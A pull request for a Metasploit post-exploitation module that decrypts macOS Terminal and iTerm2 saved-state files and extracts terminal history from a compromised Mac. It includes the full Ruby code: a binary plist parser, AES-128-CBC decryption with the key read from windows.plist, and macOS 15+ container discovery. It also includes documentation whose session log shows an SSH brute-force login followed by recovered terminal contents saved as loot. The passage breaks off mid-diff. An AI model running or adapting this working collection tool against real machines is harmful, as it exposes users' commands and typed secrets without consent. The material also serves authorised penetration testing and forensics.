### PR TITLE
Terminal save state

### DIFF
--- a/documentation/modules/post/osx/gather/terminal_save_state.md
+++ b/documentation/modules/post/osx/gather/terminal_save_state.md
@@ -17,7 +17,7 @@ Tested against macOS 11.7.11.
 4. Do: `use post/osx/gather/terminal_save_state`
 5. Do: `set session [#]`
 6. Do: `run`
-7. You should decrypted terminal sessions
+7. You should get decrypted terminal sessions
 
 ## Options
 

--- a/documentation/modules/post/osx/gather/terminal_save_state.md
+++ b/documentation/modules/post/osx/gather/terminal_save_state.md
@@ -1,0 +1,133 @@
+## Vulnerable Application
+
+This module enumerates the saved state files for the Terminal and iTerm2
+applications on macOS 10.7–12 (Lion through Monterey).
+These files are encrypted with AES-128-CBC, but
+the key is stored in plaintext in the accompanying windows.plist file.
+The decrypted files contain a copy of what was sent to and from the
+terminal, which may include sensitive information.
+
+Tested against macOS 11.7.11.
+
+## Verification Steps
+
+1. on MacOS open a terminal and type some stuff. Then type `exit`
+2. Start msfconsole
+3. Get a shell on a vulnerable MacOS
+4. Do: `use post/osx/gather/terminal_save_state`
+5. Do: `set session [#]`
+6. Do: `run`
+7. You should decrypted terminal sessions
+
+## Options
+
+### USER
+
+User to target, or ALL for all users. Defaults to `ALL`
+
+## Scenarios
+
+### macOS 11.7.11
+
+Original shell
+
+```
+msf > use auxiliary/scanner/ssh/ssh_login
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf auxiliary(scanner/ssh/ssh_login) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf auxiliary(scanner/ssh/ssh_login) > set username h00die
+username => h00die
+msf auxiliary(scanner/ssh/ssh_login) > set password "example_password"
+password =>  example_password
+msf auxiliary(scanner/ssh/ssh_login) > exploit
+[*] 1.1.1.1:22       - Starting bruteforce
+[*] 1.1.1.1:22 SSH - Testing User/Pass combinations
+[+] 1.1.1.1:22       - Success: 'h00die: example_password ' 'uid=501(h00die) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),101(com.apple.access_ssh-disabled),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),102(com.apple.access_screensharing-disabled),400(com.apple.access_remote_ae) Darwin h00dies-MacBook-Pro.local 20.6.0 Darwin Kernel Version 20.6.0: Thu Jul  6 22:12:47 PDT 2023; root:xnu-7195.141.49.702.12~1/RELEASE_X86_64 x86_64 '
+[*] SSH session 1 opened (2.2.2.2:35983 -> 1.1.1.1:22) at 2026-05-12 05:30:10 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/ssh/ssh_login) > sessions -i 1
+[*] Starting interaction with 1...
+
+sw_vers
+ProductName:    macOS
+ProductVersion: 11.7.11
+BuildVersion:   20G1443
+^Z
+Background session 1? [y/N]  y
+```
+
+Module run
+
+```
+msf auxiliary(scanner/ssh/ssh_login) > use post/osx/gather/terminal_save_state
+msf post(osx/gather/terminal_save_state) > set session 1
+session => 1
+msf post(osx/gather/terminal_save_state) > rexploit
+[*] Reloading module...
+[*] Not found: /Users/Shared/Library/Saved Application State/com.apple.Terminal.savedState
+[*] Not found: /Users/Shared/Library/Saved Application State/com.googlecode.iterm2.savedState
+[*] Processing: /Users/h00die/Library/Saved Application State/com.apple.Terminal.savedState
+[*]   Window: (no title)
+[*]   Stored window state JSON to: /root/.msf4/loot/20260512053302_default_1.1.1.1_osx.terminal.win_274926.json
+[!]   No metadata for window ID 5, skipping
+[*]   Window: (no title)
+[*]   Stored window state JSON to: /root/.msf4/loot/20260512053302_default_1.1.1.1_osx.terminal.win_874806.json
+[*]   Window: (no title)
+[*]   Stored window state JSON to: /root/.msf4/loot/20260512053302_default_1.1.1.1_osx.terminal.win_935009.json
+[!]   No metadata for window ID 5, skipping
+[!]   No metadata for window ID 17, skipping
+[*]   Window: h00die — 80×24
+[*]   Stored window state JSON to: /root/.msf4/loot/20260512053302_default_1.1.1.1_osx.terminal.win_970663.json
+[+]   Recovered terminal history for window: h00die — 80×24
+[*] h00die@h00dies-MacBook-Pro ~ % whoami
+h00die
+h00die@h00dies-MacBook-Pro ~ % nano .example
+h00die@h00dies-MacBook-Pro ~ % cat .example
+test
+h00die@h00dies-MacBook-Pro ~ % exit
+Saving session...
+...copying shared history...
+...saving history...truncating history files...
+...completed.
+
+[Process completed]
+
+[+]   Stored to: /root/.msf4/loot/20260512053302_default_1.1.1.1_osx.terminal.his_625716.txt
+[*] Not found: /Users/h00die/Library/Saved Application State/com.googlecode.iterm2.savedState
+[*] Post module execution completed
+msf post(osx/gather/terminal_save_state) > rexploit
+[*] Reloading module...
+[*] Not found: /Users/Shared/Library/Saved Application State/com.apple.Terminal.savedState
+[*] Not found: /Users/Shared/Library/Saved Application State/com.googlecode.iterm2.savedState
+[*] Processing: /Users/h00die/Library/Saved Application State/com.apple.Terminal.savedState
+[*]   Window: (no title)
+[*]   Stored window state JSON to: /root/.msf4/loot/20260512053349_default_1.1.1.1_osx.terminal.win_293819.json
+[!]   No metadata for window ID 5, skipping
+[*]   Window: (no title)
+[*]   Stored window state JSON to: /root/.msf4/loot/20260512053349_default_1.1.1.1_osx.terminal.win_601053.json
+[*]   Window: (no title)
+[*]   Stored window state JSON to: /root/.msf4/loot/20260512053349_default_1.1.1.1_osx.terminal.win_967075.json
+[!]   No metadata for window ID 5, skipping
+[!]   No metadata for window ID 17, skipping
+[*]   Window: h00die — 80×24
+[*]   Stored window state JSON to: /root/.msf4/loot/20260512053349_default_1.1.1.1_osx.terminal.win_206721.json
+[+]   Recovered terminal history for window: h00die — 80×24
+[*] h00die@h00dies-MacBook-Pro ~ % whoami
+h00die
+h00die@h00dies-MacBook-Pro ~ % nano .example
+h00die@h00dies-MacBook-Pro ~ % cat .example
+test
+h00die@h00dies-MacBook-Pro ~ % exit
+Saving session...
+...copying shared history...
+...saving history...truncating history files...
+...completed.
+
+[Process completed]
+
+[+]   Stored to: /root/.msf4/loot/20260512053349_default_1.1.1.1_osx.terminal.his_746504.txt
+[*] Not found: /Users/h00die/Library/Saved Application State/com.googlecode.iterm2.savedState
+[*] Post module execution completed
+```

--- a/documentation/modules/post/osx/gather/terminal_save_state.md
+++ b/documentation/modules/post/osx/gather/terminal_save_state.md
@@ -32,34 +32,6 @@ blank lines, tabs, and other whitespace are preserved.
 6. Do: `run`
 7. You should get decrypted terminal sessions
 
-### Synthetic regression test
-
-Run the accompanying standalone test with Ruby and macOS `plutil` from the repository root:
-
-```sh
-ruby terminal_save_state_test.rb --seed 21446
-```
-
-The test generates synthetic XML and binary plists and AES-128-CBC records and stubs the framework's session,
-file access, logging, and loot storage. It exercises the module's container mapping, legacy paths,
-UID resolution, tab rows, UTF-8 replacement, working directories, and newest-record selection.
-XML mapping tests cover shell and Meterpreter discovery, malformed inputs, and continued discovery
-after an invalid mapping. Row-rendering tests cover ASCII-space trimming, an LF per row, embedded LFs,
-blank rows, and preservation of other whitespace. Generated fixtures use temporary directories.
-Two complete records for one window, with an oversized embedded plist length in the newer `_NSWindow`
-record, must produce a warning and skip that window without exporting its older snapshot.
-A torn final record instead warns and stops while retaining the preceding complete state.
-The test should report zero failures and zero errors; it does not verify live macOS 15+ artifacts,
-Full Disk Access permissions, or execution inside Metasploit.
-
-### Real saved-state fixture validation
-
-Offline validation against a copied macOS 26.4.1 Terminal fixture resolved the real XML mapping
-in both shell and Meterpreter stubs. Recovered tab text matched the reference extractor for
-326/326 real windows by normalized SHA256 and byte length, with per-tab agreement required.
-This validates discovery and parsing through filesystem stubs, not a live Metasploit session,
-Full Disk Access behavior, iTerm2, other macOS versions, or bitmap recovery.
-
 ## Options
 
 ### USER

--- a/documentation/modules/post/osx/gather/terminal_save_state.md
+++ b/documentation/modules/post/osx/gather/terminal_save_state.md
@@ -1,13 +1,19 @@
 ## Vulnerable Application
 
 This module enumerates the saved state files for the Terminal and iTerm2
-applications on macOS 10.7–12 (Lion through Monterey).
+applications on macOS 10.7-14, and Terminal's daemon-container saved state on macOS 15 and later.
 These files are encrypted with AES-128-CBC, but
 the key is stored in plaintext in the accompanying windows.plist file.
 The decrypted files contain a copy of what was sent to and from the
 terminal, which may include sensitive information.
 
 Tested against macOS 11.7.11.
+
+On macOS 15+, Terminal's saved state is also discovered under
+`~/Library/Daemon Containers/<container UUID>/Data/Library/Saved Application State/`.
+The module reads `ApplicationMapping.plist` to locate Terminal's mapped saved-state directory.
+The process providing the session must have Full Disk Access to read this container path.
+The legacy Terminal and iTerm2 saved-state paths are still checked first.
 
 ## Verification Steps
 
@@ -18,6 +24,23 @@ Tested against macOS 11.7.11.
 5. Do: `set session [#]`
 6. Do: `run`
 7. You should get decrypted terminal sessions
+
+### Synthetic regression test
+
+Run the accompanying standalone test with Ruby and macOS `plutil` from the contribution directory:
+
+```sh
+ruby terminal_save_state_test.rb --seed 21446
+```
+
+The test generates synthetic binary plists and AES-128-CBC records and stubs the framework's session,
+file access, logging, and loot storage. It exercises the module's container mapping, legacy paths,
+UID resolution, tab rows, UTF-8 replacement, working directories, and newest-record selection.
+Two complete records for one window, with an oversized embedded plist length in the newer `_NSWindow`
+record, must produce a warning and skip that window without exporting its older snapshot.
+A torn final record instead warns and stops while retaining the preceding complete state.
+The test should report zero failures and zero errors; it does not verify live macOS 15+ artifacts,
+Full Disk Access permissions, or execution inside Metasploit.
 
 ## Options
 

--- a/documentation/modules/post/osx/gather/terminal_save_state.md
+++ b/documentation/modules/post/osx/gather/terminal_save_state.md
@@ -11,9 +11,16 @@ Tested against macOS 11.7.11.
 
 On macOS 15+, Terminal's saved state is also discovered under
 `~/Library/Daemon Containers/<container UUID>/Data/Library/Saved Application State/`.
-The module reads `ApplicationMapping.plist` to locate Terminal's mapped saved-state directory.
+The module reads XML or binary `ApplicationMapping.plist` files to locate Terminal's mapped
+saved-state directory. XML is parsed with Ruby's REXML library; no additional gem is required.
+The same format detection applies to `windows.plist`; decrypted window archives use the binary parser.
+Malformed or unrecognized mapping files produce a verbose warning and are skipped so discovery can continue.
 The process providing the session must have Full Disk Access to read this container path.
 The legacy Terminal and iTerm2 saved-state paths are still checked first.
+
+Recovered tab text trims trailing ASCII spaces from each stored row and adds one LF per row,
+including the final row, to match the reference extractor's rendering. Embedded LFs, internal
+blank lines, tabs, and other whitespace are preserved.
 
 ## Verification Steps
 
@@ -27,20 +34,31 @@ The legacy Terminal and iTerm2 saved-state paths are still checked first.
 
 ### Synthetic regression test
 
-Run the accompanying standalone test with Ruby and macOS `plutil` from the contribution directory:
+Run the accompanying standalone test with Ruby and macOS `plutil` from the repository root:
 
 ```sh
 ruby terminal_save_state_test.rb --seed 21446
 ```
 
-The test generates synthetic binary plists and AES-128-CBC records and stubs the framework's session,
+The test generates synthetic XML and binary plists and AES-128-CBC records and stubs the framework's session,
 file access, logging, and loot storage. It exercises the module's container mapping, legacy paths,
 UID resolution, tab rows, UTF-8 replacement, working directories, and newest-record selection.
+XML mapping tests cover shell and Meterpreter discovery, malformed inputs, and continued discovery
+after an invalid mapping. Row-rendering tests cover ASCII-space trimming, an LF per row, embedded LFs,
+blank rows, and preservation of other whitespace. Generated fixtures use temporary directories.
 Two complete records for one window, with an oversized embedded plist length in the newer `_NSWindow`
 record, must produce a warning and skip that window without exporting its older snapshot.
 A torn final record instead warns and stops while retaining the preceding complete state.
 The test should report zero failures and zero errors; it does not verify live macOS 15+ artifacts,
 Full Disk Access permissions, or execution inside Metasploit.
+
+### Real saved-state fixture validation
+
+Offline validation against a copied macOS 26.4.1 Terminal fixture resolved the real XML mapping
+in both shell and Meterpreter stubs. Recovered tab text matched the reference extractor for
+326/326 real windows by normalized SHA256 and byte length, with per-tab agreement required.
+This validates discovery and parsing through filesystem stubs, not a live Metasploit session,
+Full Disk Access behavior, iTerm2, other macOS versions, or bitmap recovery.
 
 ## Options
 

--- a/modules/post/osx/gather/terminal_save_state.rb
+++ b/modules/post/osx/gather/terminal_save_state.rb
@@ -152,7 +152,7 @@ class MetasploitModule < Msf::Post
         'Name' => 'macOS Terminal/iTerm2 Saved State Recovery',
         'Description' => %q{
           This module enumerates the saved state files for the Terminal and iTerm2
-          applications on macOS 10.7–12 (Lion through Monterey).
+          applications on macOS 10.7-12 (Lion through Monterey).
           These files are encrypted with AES-128-CBC, but
           the key is stored in plaintext in the accompanying windows.plist file.
           The decrypted files contain a copy of what was sent to and from the

--- a/modules/post/osx/gather/terminal_save_state.rb
+++ b/modules/post/osx/gather/terminal_save_state.rb
@@ -1,0 +1,363 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'openssl'
+require 'json'
+
+# Binary plist parser ported from bplist.py by Willi Ballenthin
+# https://gist.github.com/williballenthin/ab23abd5eec5bf5a272bfcfb2342ec04
+#
+# Supports all token types used by macOS SavedState artifacts:
+#   null, bool, int, real, date, data, ASCII/Unicode string, UID, array, dict
+class BplistParser
+  MAGIC = 'bplist00'.b.freeze
+
+  class ParseError < StandardError; end
+
+  def initialize(data)
+    @buf = data.b
+  end
+
+  def parse
+    raise ParseError, 'Not a binary plist' unless @buf[0, 8] == MAGIC
+    raise ParseError, 'Data too short' if @buf.length < 40
+
+    # Trailer layout (last 32 bytes, all big-endian):
+    #   6 unused | offset_size (1) | ref_size (1) | num_objects (8) | top_object (8) | offset_table_offset (8)
+    _unused, offset_size, ref_size, num_objects, top_object, offset_table_offset =
+      @buf[-32..].unpack('a6CCQ>Q>Q>')
+
+    @ref_size = ref_size
+    @object_offsets = @buf[offset_table_offset, num_objects * offset_size]
+                      .unpack(uint_fmt(offset_size) * num_objects)
+    @objects = Array.new(num_objects)
+    @parsed = Array.new(num_objects, false)
+
+    read_object(top_object)
+  rescue ParseError
+    raise
+  rescue IndexError, TypeError, ArgumentError, RangeError => e
+    raise ParseError, "Parse failed: #{e}"
+  end
+
+  private
+
+  def uint_fmt(size)
+    case size
+    when 1 then 'C'
+    when 2 then 'n'
+    when 4 then 'N'
+    when 8 then 'Q>'
+    else raise ParseError, "Unsupported integer size: #{size}"
+    end
+  end
+
+  # When token_l == 0xF the real count is stored inline as a sized integer.
+  # Returns [new_pos, count].
+  def read_extended_count(pos)
+    m = @buf.getbyte(pos) & 0x3
+    s = 1 << m
+    [pos + 1 + s, @buf[pos + 1, s].unpack1(uint_fmt(s))]
+  end
+
+  def resolve_count(pos, token_l)
+    token_l == 0xF ? read_extended_count(pos) : [pos, token_l]
+  end
+
+  def read_object(ref)
+    return @objects[ref] if @parsed[ref]
+
+    offset = @object_offsets[ref]
+    token = @buf.getbyte(offset)
+    token_h = token & 0xF0
+    token_l = token & 0x0F
+    pos = offset + 1
+
+    obj = case token
+          when 0x00 then nil
+          when 0x08 then false
+          when 0x09 then true
+          when 0x0F then ''.b
+          else
+            case token_h
+            when 0x10 # int
+              s = 1 << token_l
+              token_l >= 3 ? @buf[pos, s].unpack1('q>') : @buf[pos, s].unpack1(uint_fmt(s))
+
+            when 0x20 # real
+              case token_l
+              when 2 then @buf[pos, 4].unpack1('g')
+              when 3 then @buf[pos, 8].unpack1('G')
+              end
+
+            when 0x30 # date (token 0x33)
+              Time.utc(2001, 1, 1) + @buf[pos, 8].unpack1('G')
+
+            when 0x40 # data — return as binary String
+              pos, s = resolve_count(pos, token_l)
+              @buf[pos, s].b
+
+            when 0x50 # ASCII string
+              pos, s = resolve_count(pos, token_l)
+              @buf[pos, s].encode('UTF-8', 'ASCII-8BIT', invalid: :replace, undef: :replace)
+
+            when 0x60 # UTF-16BE string
+              pos, s = resolve_count(pos, token_l)
+              @buf[pos, s * 2].encode('UTF-8', 'UTF-16BE', invalid: :replace, undef: :replace)
+
+            when 0x80 # UID — store as plain integer
+              @buf[pos, 1 + token_l].unpack('C*').reduce(0) { |acc, b| (acc << 8) | b }
+
+            when 0xA0 # array
+              pos, s = resolve_count(pos, token_l)
+              refs = @buf[pos, s * @ref_size].unpack(uint_fmt(@ref_size) * s)
+              arr = []
+              @objects[ref] = arr
+              @parsed[ref] = true
+              refs.each { |r| arr << read_object(r) }
+              arr
+
+            when 0xD0 # dict
+              pos, s = resolve_count(pos, token_l)
+              key_refs = @buf[pos, s * @ref_size].unpack(uint_fmt(@ref_size) * s)
+              pos += s * @ref_size
+              val_refs = @buf[pos, s * @ref_size].unpack(uint_fmt(@ref_size) * s)
+              hsh = {}
+              @objects[ref] = hsh
+              @parsed[ref] = true
+              key_refs.zip(val_refs).each { |k, v| hsh[read_object(k)] = read_object(v) }
+              hsh
+
+            else
+              raise ParseError, "Unknown plist token: 0x#{token.to_s(16)}"
+            end
+          end
+
+    @objects[ref] = obj unless @parsed[ref]
+    @parsed[ref] = true
+    obj
+  end
+end
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'macOS Terminal/iTerm2 Saved State Recovery',
+        'Description' => %q{
+          This module enumerates the saved state files for the Terminal and iTerm2
+          applications on macOS. These files are encrypted with AES-128-CBC, but
+          the key is stored in plaintext in the accompanying windows.plist file.
+          The decrypted files contain a copy of what was sent to and from the
+          terminal, which may include sensitive information.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die',                                        # msf module
+          'Willi Ballenthin <willi.ballenthin@gmail.com>', # PoC
+          'kshitij Kumar <kshitij.kumar@crowdstrike.com>'  # PoC
+        ],
+        'Platform' => ['osx'],
+        'SessionTypes' => ['meterpreter', 'shell'],
+        'References' => [
+          ['URL', 'https://github.com/CrowdStrike/automactc/blob/master/modules/mod_terminalstate_v100.py'],
+          ['URL', 'https://gist.github.com/williballenthin/ab23abd5eec5bf5a272bfcfb2342ec04']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options([
+      OptString.new('USER', [true, 'User to target, or ALL for all users', 'ALL'])
+    ])
+  end
+
+  SAVED_STATE_APPS = [
+    'com.apple.Terminal.savedState',
+    'com.googlecode.iterm2.savedState'
+  ].freeze
+
+  def parse_binary_plist(data)
+    BplistParser.new(data).parse
+  end
+
+  # Recursively converts parsed plist values to JSON-safe types.
+  # Binary strings become "hex://..." since they may not be valid UTF-8.
+  # Time objects become ISO-8601 strings. Everything else maps directly.
+  def plist_to_json_value(obj)
+    case obj
+    when Hash then obj.transform_values { |v| plist_to_json_value(v) }
+    when Array then obj.map { |v| plist_to_json_value(v) }
+    when String
+      obj.encoding == ::Encoding::ASCII_8BIT ? "hex://#{obj.unpack1('H*')}" : obj
+    when Time then obj.utc.iso8601
+    else obj
+    end
+  end
+
+  def aes128_cbc_decrypt(key, ciphertext, iv = "\x00" * 16)
+    cipher = OpenSSL::Cipher.new('AES-128-CBC')
+    cipher.decrypt
+    cipher.key = key
+    cipher.iv = iv
+    cipher.padding = 0
+    cipher.update(ciphertext) + cipher.final
+  end
+
+  # Parses the custom struct wrapping the NSKeyedArchiver bplist inside a decrypted window state.
+  #
+  # Layout (all big-endian):
+  #   uint32_t unk1
+  #   uint32_t class_name_size
+  #   char     class_name[class_name_size]
+  #   char     magic[4]       # 'rchv'
+  #   uint32_t plist_size
+  #   uint8_t  plist[plist_size]
+  #
+  # Returns the raw bplist bytes, or nil if the magic is wrong.
+  def parse_window_header(buf)
+    buf = buf.b
+    _unk1, class_name_size = buf.unpack('NN')
+    offset = 8
+    offset += class_name_size
+    magic = buf[offset, 4]
+    offset += 4
+    return nil unless magic == 'rchv'
+
+    plist_size = buf[offset, 4].unpack1('N')
+    offset += 4
+    buf[offset, plist_size]
+  end
+
+  # Parses one NSCR window state blob, finds its decryption key in windows_meta,
+  # decrypts it, and returns [size, window_meta, inner_plist_bytes].
+  # Returns [size, nil, nil] if the window metadata is missing.
+  # Returns nil if the magic/version is invalid.
+  def decrypt_window(windows_meta, buf)
+    buf = buf.b
+    magic = buf[0, 4]
+    version = buf[4, 4]
+    return nil unless magic == 'NSCR' && version == '1000'
+
+    window_id, size = buf[8, 8].unpack('NN')
+    ciphertext = buf[0x10, size - 0x10]
+
+    window = windows_meta.find { |w| w['NSWindowID'] == window_id }
+    unless window
+      vprint_warning("  No metadata for window ID #{window_id}, skipping")
+      return [size, nil, nil]
+    end
+
+    # NSDataKey is the raw 16-byte AES-128 key stored as binary data in the plist
+    key = window['NSDataKey']
+    plaintext = aes128_cbc_decrypt(key, ciphertext)
+    plist_bytes = parse_window_header(plaintext)
+
+    [size, window, plist_bytes]
+  end
+
+  # Extracts terminal scrollback content from a parsed NSKeyedArchiver plist.
+  # $objects[33+] holds the terminal line strings per the SavedState format.
+  # Terminal lines are stored as NSData (binary, ASCII_8BIT encoding).
+  # Metadata strings (window geometry, class names, etc.) are NSString (UTF-8).
+  def extract_terminal_content(state)
+    objects = state['$objects']
+    return nil if objects.nil? || objects.length <= 32
+
+    content = objects[33..].select { |o| o.is_a?(String) && o.encoding == ::Encoding::ASCII_8BIT }
+                           .map { |s| s.encode('UTF-8', 'ASCII-8BIT', invalid: :replace, undef: :replace) }
+                           .join
+    content.sub(/(\[Process completed\]\n).*/m, '\1')
+  end
+
+  def process_saved_state(path)
+    windows_plist = "#{path}/windows.plist"
+    data_file = "#{path}/data.data"
+
+    unless file?(windows_plist) && file?(data_file)
+      vprint_status("Not found: #{path}")
+      return
+    end
+
+    print_status("Processing: #{path}")
+
+    windows_meta = parse_binary_plist(read_file(windows_plist))
+    data = read_file(data_file).b
+    pos = 0
+
+    while pos <= data.length - 0x10
+      break unless data[pos, 4] == 'NSCR'
+
+      result = decrypt_window(windows_meta, data[pos..])
+      break if result.nil?
+
+      size, window, plist_bytes = result
+      break if size.nil? || size <= 0x10
+
+      pos += size
+      next if plist_bytes.nil? || window.nil?
+
+      title = window.fetch('NSTitle', '(no title)')
+      vprint_status("  Window: #{title}")
+
+      begin
+        state = parse_binary_plist(plist_bytes)
+        state_json = JSON.pretty_generate(plist_to_json_value(state))
+      rescue BplistParser::ParseError, JSON::GeneratorError => e
+        vprint_error("  Failed to process window plist: #{e}")
+        next
+      end
+
+      loot_json = store_loot(
+        'osx.terminal.window.json',
+        'application/json',
+        session,
+        state_json,
+        'window_state.json',
+        "macOS Terminal window state (JSON) - #{title}"
+      )
+      vprint_status("  Stored window state JSON to: #{loot_json}")
+
+      content = extract_terminal_content(state)
+      next if content.nil? || content.empty?
+
+      print_good("  Recovered terminal history for window: #{title}")
+      print_status(content)
+
+      loot = store_loot(
+        'osx.terminal.history',
+        'text/plain',
+        session,
+        content,
+        'terminal_history.txt',
+        "macOS terminal history - #{title}"
+      )
+      print_good("  Stored to: #{loot}")
+    end
+  rescue BplistParser::ParseError => e
+    print_error("Failed to parse #{windows_plist}: #{e}")
+  end
+
+  def run
+    users = if datastore['USER'] == 'ALL'
+              cmd_exec('ls /Users').split
+            else
+              [datastore['USER']]
+            end
+
+    users.each do |user|
+      SAVED_STATE_APPS.each do |app|
+        process_saved_state("/Users/#{user}/Library/Saved Application State/#{app}")
+      end
+    end
+  end
+end

--- a/modules/post/osx/gather/terminal_save_state.rb
+++ b/modules/post/osx/gather/terminal_save_state.rb
@@ -152,10 +152,13 @@ class MetasploitModule < Msf::Post
         'Name' => 'macOS Terminal/iTerm2 Saved State Recovery',
         'Description' => %q{
           This module enumerates the saved state files for the Terminal and iTerm2
-          applications on macOS. These files are encrypted with AES-128-CBC, but
+          applications on macOS 10.7–12 (Lion through Monterey).
+          These files are encrypted with AES-128-CBC, but
           the key is stored in plaintext in the accompanying windows.plist file.
           The decrypted files contain a copy of what was sent to and from the
           terminal, which may include sensitive information.
+
+          Tested against macOS 11.7.11.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -166,12 +169,15 @@ class MetasploitModule < Msf::Post
         'Platform' => ['osx'],
         'SessionTypes' => ['meterpreter', 'shell'],
         'References' => [
-          ['URL', 'https://github.com/CrowdStrike/automactc/blob/master/modules/mod_terminalstate_v100.py'],
-          ['URL', 'https://gist.github.com/williballenthin/ab23abd5eec5bf5a272bfcfb2342ec04']
+          # dead url, not sure what happened to it, leaving it here though since it was one of the original sources
+          # ['URL', 'https://github.com/CrowdStrike/automactc/blob/master/modules/mod_terminalstate_v100.py'],
+          ['URL', 'https://www.crowdstrike.com/en-us/blog/reconstructing-command-line-activity-on-macos/'],
+          ['URL', 'https://gist.github.com/williballenthin/ab23abd5eec5bf5a272bfcfb2342ec04'],
+          ['ATT&CK', Mitre::Attack::Technique::T1552_003_BASH_HISTORY] # Shell history according to the website https://attack.mitre.org/techniques/T1552/003/
         ],
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'SideEffects' => [ARTIFACTS_ON_DISK],
+          'SideEffects' => [],
           'Reliability' => []
         }
       )

--- a/modules/post/osx/gather/terminal_save_state.rb
+++ b/modules/post/osx/gather/terminal_save_state.rb
@@ -169,6 +169,7 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die',                                        # msf module
+          'willmcginnis',                                  # macOS 15+ saved-state recovery
           'Willi Ballenthin <willi.ballenthin@gmail.com>', # PoC
           'kshitij Kumar <kshitij.kumar@crowdstrike.com>'  # PoC
         ],

--- a/modules/post/osx/gather/terminal_save_state.rb
+++ b/modules/post/osx/gather/terminal_save_state.rb
@@ -5,6 +5,7 @@
 
 require 'openssl'
 require 'json'
+require 'shellwords'
 
 # Binary plist parser ported from bplist.py by Willi Ballenthin
 # https://gist.github.com/williballenthin/ab23abd5eec5bf5a272bfcfb2342ec04
@@ -13,6 +14,7 @@ require 'json'
 #   null, bool, int, real, date, data, ASCII/Unicode string, UID, array, dict
 class BplistParser
   MAGIC = 'bplist00'.b.freeze
+  UID = Struct.new(:value)
 
   class ParseError < StandardError; end
 
@@ -38,7 +40,7 @@ class BplistParser
     read_object(top_object)
   rescue ParseError
     raise
-  rescue IndexError, TypeError, ArgumentError, RangeError => e
+  rescue IndexError, TypeError, ArgumentError, RangeError, NoMethodError => e
     raise ParseError, "Parse failed: #{e}"
   end
 
@@ -107,8 +109,8 @@ class BplistParser
               pos, s = resolve_count(pos, token_l)
               @buf[pos, s * 2].encode('UTF-8', 'UTF-16BE', invalid: :replace, undef: :replace)
 
-            when 0x80 # UID — store as plain integer
-              @buf[pos, 1 + token_l].unpack('C*').reduce(0) { |acc, b| (acc << 8) | b }
+            when 0x80 # UID must remain distinct from an ordinary integer
+              UID.new(@buf[pos, 1 + token_l].unpack('C*').reduce(0) { |acc, byte| (acc << 8) | byte })
 
             when 0xA0 # array
               pos, s = resolve_count(pos, token_l)
@@ -152,7 +154,8 @@ class MetasploitModule < Msf::Post
         'Name' => 'macOS Terminal/iTerm2 Saved State Recovery',
         'Description' => %q{
           This module enumerates the saved state files for the Terminal and iTerm2
-          applications on macOS 10.7-12 (Lion through Monterey).
+          applications on macOS 10.7-14, and Terminal's daemon container saved
+          state on macOS 15 and later (requires Full Disk Access).
           These files are encrypted with AES-128-CBC, but
           the key is stored in plaintext in the accompanying windows.plist file.
           The decrypted files contain a copy of what was sent to and from the
@@ -196,11 +199,48 @@ class MetasploitModule < Msf::Post
     BplistParser.new(data).parse
   end
 
+  def terminal_container_paths(user)
+    paths = []
+    containers = "/Users/#{user}/Library/Daemon Containers"
+    return paths unless directory?(containers)
+
+    # Full Disk Access is required to read the macOS 15+ daemon container path.
+    directory = session.type == 'meterpreter' ? containers : Shellwords.escape(containers)
+    dir(directory).each do |container|
+      next if ['.', '..'].include?(container)
+
+      saved_state = "#{containers}/#{container}/Data/Library/Saved Application State"
+      mapping_file = "#{saved_state}/ApplicationMapping.plist"
+      next unless file?(mapping_file)
+
+      begin
+        mapping = parse_binary_plist(read_file(mapping_file))
+        next unless mapping.is_a?(Array)
+
+        # The flat array alternates an application dictionary and its saved-state UUID.
+        mapping.each_slice(2) do |application, uuid|
+          next unless application.is_a?(Hash) && application['protected'].is_a?(Hash)
+          next unless application['protected']['signingIdentifier'] == 'com.apple.Terminal'
+          next unless uuid.is_a?(String) && !uuid.empty?
+
+          paths << "#{saved_state}/#{uuid}.savedState"
+        end
+      rescue StandardError => e
+        vprint_warning("Unable to read #{mapping_file}: #{e}")
+      end
+    end
+    paths.uniq
+  rescue StandardError => e
+    vprint_warning("Unable to enumerate #{containers} (Full Disk Access may be required): #{e}")
+    paths
+  end
+
   # Recursively converts parsed plist values to JSON-safe types.
   # Binary strings become "hex://..." since they may not be valid UTF-8.
   # Time objects become ISO-8601 strings. Everything else maps directly.
   def plist_to_json_value(obj)
     case obj
+    when BplistParser::UID then { 'CF$UID' => obj.value }
     when Hash then obj.transform_values { |v| plist_to_json_value(v) }
     when Array then obj.map { |v| plist_to_json_value(v) }
     when String
@@ -214,10 +254,14 @@ class MetasploitModule < Msf::Post
     cipher = OpenSSL::Cipher.new('AES-128-CBC')
     cipher.decrypt
     cipher.key = key
+    # The undocumented IV is all zero bytes; a random IV corrupts block 0.
     cipher.iv = iv
     cipher.padding = 0
     cipher.update(ciphertext) + cipher.final
   end
+
+  # A recognized _NSWindow record must supersede earlier state even if its envelope is invalid.
+  class WindowEnvelopeError < BplistParser::ParseError; end
 
   # Parses the custom struct wrapping the NSKeyedArchiver bplist inside a decrypted window state.
   #
@@ -229,23 +273,32 @@ class MetasploitModule < Msf::Post
   #   uint32_t plist_size
   #   uint8_t  plist[plist_size]
   #
-  # Returns the raw bplist bytes, or nil if the magic is wrong.
+  # Returns the raw bplist bytes, or nil for a key other than _NSWindow.
   def parse_window_header(buf)
     buf = buf.b
+    raise BplistParser::ParseError, 'Truncated window envelope' if buf.bytesize < 16
+
